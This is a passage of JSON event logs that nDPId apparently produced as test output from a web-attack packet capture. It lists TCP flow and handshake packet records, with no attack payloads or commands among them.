+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":2,"flow_last_seen":1499348092675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjCznHw5PAmhptaAScSA2JwAAAgQFtAQCCAoD5wQCAT0yjgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":3,"flow_last_seen":1499348092676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348092676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WztAAD4Gap2sEAABwKgKMowsAFACaGm15x8OUIAQAOXVLgAAAQEICgE9Mo4D5wQC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348095258,"flow_last_seen":1499348095258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348095258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1499348095258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kglAAD4GM8esEAABwKgKMoxGAFCLy6cdAAAAAKACchBpMwAAAgQFtAQCCAoBPTUUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":2,"flow_last_seen":1499348095258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjEYHlr2li8unHqAScSCaZwAAAgQFtAQCCAoD5waIAT01FAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":3,"flow_last_seen":1499348095259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348095259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kgpAAD4GM86sEAABwKgKMoxGAFCLy6ceB5a9poAQAOU5bwAAAQEICgE9NRQD5waI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348096595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gtxAAD4GQvSsEAABwKgKMoxUAFDl8LS+AAAAAKACchAAEQAAAgQFtAQCCAoBPTZiAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":2,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjFQs5xqq5fC0v6AScSCtoQAAAgQFtAQCCAoD5wfWAT02YgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":3,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gt1AAD4GQvusEAABwKgKMoxUAFDl8LS\/LOcaq4AQAOVMqQAAAQEICgE9NmID5wfW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348099359,"flow_last_seen":1499348099359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1499348099359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tSBAAD4GELCsEAABwKgKMoxuAFCNr4w1AAAAAKACchB+DgAAAgQFtAQCCAoBPTkVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":2,"flow_last_seen":1499348099359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjG7WE+F5ja+MNqAScSC47wAAAgQFtAQCCAoD5wqJAT05FQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":3,"flow_last_seen":1499348099360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348099360,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tSFAAD4GELesEAABwKgKMoxuAFCNr4w21hPheoAQAOVX9wAAAQEICgE9ORUD5wqJ"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 